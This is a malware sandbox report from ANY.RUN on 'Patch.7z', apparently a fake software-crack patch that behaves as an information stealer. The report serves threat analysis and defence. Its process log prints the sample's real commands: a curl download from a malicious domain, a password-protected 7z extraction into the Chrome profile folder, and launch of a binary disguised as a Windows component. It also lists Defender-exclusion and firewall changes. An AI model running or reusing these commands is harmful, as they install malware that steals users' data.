File name:

Patch.7z

Full analysis: https://app.any.run/tasks/14caf700-db1a-4cbb-abc1-9ce5f9bb0ee7
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: February 14, 2025, 19:22:36
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
arch-exec
stealer
evasion
Indicators:
MIME: application/x-7z-compressed
File info: 7-zip archive data, version 0.4
MD5:

DF50A016C6A467AFB1D9BAF64A8FA777

SHA1:

37B8B5564DA5860AD20B60348893D674A069E76A

SHA256:

21EC5341D805322B77C67A1E5886E03880D62B19BD8AFD6D07B101F920EA855F

SSDEEP:

98304:xrTw5/kwnXIubgPFuiSIy3lDg+6ABWEirS8Aj/OEbXwewKsh+uxxpuDs8342ReE3:DNK8Pkq003zScRcV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Adds process to the Windows Defender exclusion list

      • cmd.exe (PID: 640)

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 640)

    • Actions looks like stealing of personal data

      • 7z.exe (PID: 1876)
      • Windows Driver Foundation (WDF).exe (PID: 2976)
      • cmd.exe (PID: 640)
      • csrss.exe (PID: 616)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • Patch JB 2023.x.x.exe (PID: 6160)
      • 7z.exe (PID: 1876)

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 6368)
      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Starts CMD.EXE for commands execution

      • Patch JB 2023.x.x.exe (PID: 6760)

    • Drops 7-zip archiver for unpacking

      • Patch JB 2023.x.x.exe (PID: 6160)

    • Script adds exclusion process to Windows Defender

      • cmd.exe (PID: 640)

    • Executing commands from a ".bat" file

      • Patch JB 2023.x.x.exe (PID: 6760)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 640)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 640)

    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 640)

    • Process drops legitimate windows executable

      • 7z.exe (PID: 1876)

    • Checks Windows Trust Settings

      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • The process creates files with name similar to system file names

      • 7z.exe (PID: 1876)

    • Uses NETSH.EXE to add a firewall rule or allowed programs

      • cmd.exe (PID: 640)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 640)

    • The executable file from the user directory is run by the CMD process

      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Connects to unusual port

      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Connects to SMTP port

      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Checks for external IP

      • Windows Driver Foundation (WDF).exe (PID: 2976)
      • svchost.exe (PID: 2192)

  • INFO

    • The sample compiled with english language support

      • Patch JB 2023.x.x.exe (PID: 6160)
      • 7z.exe (PID: 1876)

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 6368)

    • Execution of CURL command

      • cmd.exe (PID: 640)

    • Checks supported languages

      • curl.exe (PID: 7096)
      • 7z.exe (PID: 1876)
      • curl.exe (PID: 4020)
      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Reads the computer name

      • curl.exe (PID: 7096)
      • 7z.exe (PID: 1876)
      • curl.exe (PID: 4020)
      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Create files in a temporary directory

      • curl.exe (PID: 7096)

    • Creates files or folders in the user directory

      • 7z.exe (PID: 1876)
      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • The sample compiled with chinese language support

      • 7z.exe (PID: 1876)

    • The sample compiled with french language support

      • 7z.exe (PID: 1876)

    • The sample compiled with japanese language support

      • 7z.exe (PID: 1876)

    • The sample compiled with Italian language support

      • 7z.exe (PID: 1876)

    • The sample compiled with polish language support

      • 7z.exe (PID: 1876)

    • The sample compiled with korean language support

      • 7z.exe (PID: 1876)

    • The sample compiled with portuguese language support

      • 7z.exe (PID: 1876)

    • The sample compiled with russian language support

      • 7z.exe (PID: 1876)

    • The sample compiled with turkish language support

      • 7z.exe (PID: 1876)

    • The sample compiled with spanish language support

      • 7z.exe (PID: 1876)

    • The sample compiled with czech language support

      • 7z.exe (PID: 1876)

    • Creates files in the program directory

      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Reads the machine GUID from the registry

      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Checks proxy server information

      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Disables trace logs

      • Windows Driver Foundation (WDF).exe (PID: 2976)

    • Reads the software policy settings

      • Windows Driver Foundation (WDF).exe (PID: 2976)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.7z | 7-Zip compressed archive (v0.4) (57.1)
.7z | 7-Zip compressed archive (gen) (42.8)

EXIF

ZIP

FileVersion: 7z v0.04
ModifyDate: 2023:06:27 17:36:29+00:00
ArchivedFileName: Patch JB 2023.x.x.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
162
Monitored processes
12
Malicious processes
3
Suspicious processes
5

Behavior graph

Click at the process to see the details
start winrar.exe patch jb 2023.x.x.exe cmd.exe no specs svchost.exe patch jb 2023.x.x.exe cmd.exe curl.exe 7z.exe windows driver foundation (wdf).exe curl.exe rundll32.exe no specs csrss.exe

Process information

PID
CMD
Path
Indicators
Parent process
616%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\System32\csrss.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Client Server Runtime Process
Version:
10.0.19041.1 (WinBuild.160101.0800)
640C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\cc.bat""C:\Windows\System32\cmd.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1876"C:\Program Files (x86)\7-zip\7z.exe" x "C:\Users\admin\AppData\Local\Temp\NetFramework.4.5.7z" -o"C:\Users\admin\AppData\Local\google\chrome\user data" -pvdgdfgfHDSzxsHJCXdfdt45rtec5 -yC:\Program Files (x86)\7-Zip\7z.exe
cmd.exe
User:
admin
Company:
Igor Pavlov
Integrity Level:
HIGH
Description:
7-Zip Console
Exit code:
0
Version:
22.01
Modules
Images
c:\program files (x86)\7-zip\7z.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\syswow64\msvcp_win.dll
2120C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\System32\rundll32.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2976"C:\Users\admin\AppData\Local\google\chrome\user data\windows driver foundation (wdf).exe" -sdkKey 4e778bf2-7730-4884-91bb-ae9e7f00d213C:\Users\admin\AppData\Local\Google\Chrome\User Data\Windows Driver Foundation (WDF).exe
cmd.exe
User:
admin
Integrity Level:
HIGH
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\google\chrome\user data\windows driver foundation (wdf).exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
4020curl -k -L "https://zeltitmp.net/pp/cu/cu.php?ip=84.17.49.16&vos=10&cid=DE&sid=jb23_3&pid=p2&s=1" --user-agent "cnfvp201"C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
6160"C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.29557\Patch JB 2023.x.x.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.29557\Patch JB 2023.x.x.exe
WinRAR.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
6368"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\Patch.7zC:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
6760"C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.27993\Patch JB 2023.x.x.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.27993\Patch JB 2023.x.x.exe
WinRAR.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Total events
5 425
Read events
5 403
Write events
22
Delete events
0

Modification events

(PID) Process:(6368) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(6368) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(6368) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(6368) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Patch.7z
(PID) Process:(6368) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(6368) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(6368) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(6368) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(2976) Windows Driver Foundation (WDF).exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Windows Driver Foundation (WDF)_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2976) Windows Driver Foundation (WDF).exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Windows Driver Foundation (WDF)_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
Executable files
192
Suspicious files
4
Text files
27
Unknown types
0

Dropped files

PID
Process
Filename
Type
6160Patch JB 2023.x.x.exeC:\Users\admin\AppData\Local\Temp\qb13D4C8.66\jbl.7z
MD5:
SHA256:
18767z.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Microsoft.Extensions.DependencyInjection.Abstractions.xmlxml
MD5:5B265E477F90803DC73E4949142E79EA
SHA256:2101D1050C7F6A1A59A2840082FCE4E0340C09C5D8A89126A49F1BDA47921008
6368WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa6368.27993\Patch JB 2023.x.x.exeexecutable
MD5:2225A9180E142415AE27486FC2631809
SHA256:78DEA6CE89D0EF782AAEDDC45ABBF492F6B272E8804D9F1528E3FEA7AA81B6C6
6368WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa6368.29557\Patch JB 2023.x.x.exeexecutable
MD5:2225A9180E142415AE27486FC2631809
SHA256:78DEA6CE89D0EF782AAEDDC45ABBF492F6B272E8804D9F1528E3FEA7AA81B6C6
6160Patch JB 2023.x.x.exeC:\Users\admin\AppData\Local\Temp\qb13D4C8.66\7z2201.exeexecutable
MD5:734E95CDBE04F53FE7C28EEAAAAD7327
SHA256:8C8FBCF80F0484B48A07BD20E512B103969992DBF81B6588832B08205E3A1B43
6160Patch JB 2023.x.x.exeC:\Users\admin\AppData\Local\Temp\qb13D4C8.66\jbk.7zcompressed
MD5:E4E67D6F10C69CB29C4815A2ECDA209F
SHA256:52B7E3123089A575490BBD81342A10AD6ABA22FC54C2A7D5E6D1FC421E99F60D
6160Patch JB 2023.x.x.exeC:\Users\admin\AppData\Local\Temp\qb13D4C8.66\cnftext
MD5:35E1BB2031151679C925845801ADEFBE
SHA256:5F62EF0DF8A6B126356145B88954C150E2D56C4EE2312DE011A36949719A9849
18767z.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Microsoft.Bcl.AsyncInterfaces.xmlxml
MD5:1FC4BC74B30D484C24B04DE5C0A38F5E
SHA256:3D06C35D7B0ECA37ABE2D135CFE12D1012816A99E5E92E0CF4E8501E1B540AAE
6160Patch JB 2023.x.x.exeC:\Users\admin\AppData\Local\Temp\qb13D4C8.66\jb.7zcompressed
MD5:3056453B2EA9A7987180A0F7C6E0601D
SHA256:B572E1B4AF12863E3444049875BC5FDFCF5B126F29938D4D1A46D3A473554C49
7096curl.exeC:\Users\admin\AppData\Local\Temp\NetFramework.4.5.7zcompressed
MD5:51C1EFD06927FAA106E78AEB03D48C0F
SHA256:D1D985FB50DC18EADCC6D7336B5CA5FA330619CD34D87B378402AB6D8A0A61C7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
48
DNS requests
28
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.163:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6600
backgroundTaskHost.exe
GET
200
23.54.109.203:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
2976
Windows Driver Foundation (WDF).exe
GET
200
51.159.182.2:80
http://verification.repocket.com/api/peer/verification
unknown
unknown
2976
Windows Driver Foundation (WDF).exe
GET
200
208.95.112.1:80
http://ip-api.com/json
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4712
MoUsoCoreWorker.exe
23.48.23.163:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
104.126.37.128:443
Akamai International B.V.
DE
unknown
4
System
192.168.100.255:137
whitelisted
2.19.106.8:443
go.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
2.21.65.132:443
www.bing.com
Akamai International B.V.
NL
whitelisted
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
34.117.59.81:443
ipinfo.io
GOOGLE-CLOUD-PLATFORM
US
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.18.14
  • 142.250.186.142
whitelisted
crl.microsoft.com
  • 23.48.23.163
  • 23.48.23.159
  • 23.48.23.161
  • 23.48.23.172
  • 23.48.23.173
  • 23.48.23.169
  • 23.48.23.170
  • 23.48.23.160
  • 23.48.23.166
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 2.23.246.101
whitelisted
go.microsoft.com
  • 2.19.106.8
whitelisted
www.bing.com
  • 2.21.65.132
  • 2.21.65.154
whitelisted
ocsp.digicert.com
  • 2.23.77.188
  • 23.54.109.203
whitelisted
ipinfo.io
  • 34.117.59.81
whitelisted
login.live.com
  • 20.190.159.4
  • 40.126.31.0
  • 40.126.31.128
  • 40.126.31.129
  • 20.190.159.130
  • 40.126.31.1
  • 20.190.159.71
  • 40.126.31.73
whitelisted
c.zeltitmp.net
  • 141.136.39.211
malicious
zeltitmp.net
  • 141.136.39.211
malicious

Threats

PID
Process
Class
Message
2192
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io)
Device Retrieving External IP Address Detected
ET INFO Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup SSL Cert Observed (ipinfo .io)
Device Retrieving External IP Address Detected
ET INFO Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup SSL Cert Observed (ipinfo .io)
2192
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
2976
Windows Driver Foundation (WDF).exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ip-api.com
2192
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Patch.7z